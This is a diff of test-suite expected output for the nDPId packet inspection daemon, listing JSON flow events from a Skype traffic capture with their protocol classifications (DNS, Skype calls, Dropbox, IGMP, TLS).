-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642247,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969642247,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00641{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":472,"flow_first_seen":1431969710853,"flow_last_seen":1431969807279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":133455,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969712918,"flow_last_seen":1431969747557,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969723979,"flow_last_seen":1431969750316,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777184,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969664357,"flow_last_seen":1431969789358,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969712918,"flow_last_seen":1431969747557,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969723979,"flow_last_seen":1431969750316,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777184,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969664357,"flow_last_seen":1431969789358,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969712913,"flow_last_seen":1431969714738,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54067,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969712913,"flow_last_seen":1431969714738,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54067,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969641947,"flow_last_seen":1431969668369,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969641948,"flow_last_seen":1431969668369,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777185,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":86,"flow_first_seen":1431969719110,"flow_last_seen":1431969765415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15522,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969641947,"flow_last_seen":1431969668369,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969641948,"flow_last_seen":1431969668369,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777185,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1431969719110,"flow_last_seen":1431969765415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15522,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} 
00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 